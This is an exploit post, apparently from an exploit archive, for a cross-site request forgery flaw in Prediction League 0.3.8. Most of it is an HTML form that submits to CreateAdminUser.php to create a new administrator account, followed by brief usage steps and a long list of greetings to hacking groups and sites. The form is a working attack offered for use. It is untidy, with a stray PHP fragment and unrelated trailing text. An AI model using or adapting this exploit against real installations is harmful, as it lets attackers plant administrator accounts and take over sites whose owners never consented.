======================================================================================== | # Title: Prediction League 0.3.8 CSRF Create Admin User Exploit | # Author : indoushka | # Home : www.iqs3cur1ty.com/vb | # Tested on: Lunix Français v.(9.4 Ubuntu) | # Bug: CSRF Create Admin User Exploit ======================Exploit By indoushka ================================= # Exploit: <form method="POST" action="http://127.0.0.1/PredictionLeague/CreateAdminUser.php"> <table> <tr> <td class="TBLHEAD" colspan="3" align="CENTER"> <font class="TBLHEAD"> Admin User Administration </font> </td> </tr> <tr> <td class="TBLROW"> <font class="TBLROW"> Admin User Name </font> </td> <td class="TBLROW"> <font class="TBLROW"> <input type="TEXT" size="20" name="USER" value=""> </font> </td> <td class="TBLROW"> <font class="TBLROW"> The name for the admin user. </font> </td> </tr> <tr> <td class="TBLROW"> <font class="TBLROW"> Password </font> </td> <td class="TBLROW"> <font class="TBLROW"> <input type="TEXT" size="20" name="PASSWORD"> </font> </td> <td class="TBLROW"> <font class="TBLROW"> The password for the admin user. </font> </td> </tr> <tr> <td colspan="3" class="TBLROW" align="CENTER"> <input type="SUBMIT" NAME="CREATE" VALUE="CREATE"> </td> </tr> </table> </form> <?php } ?> </body> </html> 2 - Save As .html 3 - Login Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca) all my friend : His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) www.owned-m.com * Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/ www.securityreason.com * www.m-y.cc * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net --------------------------------------------------------------------------------------------------------------
体验盒子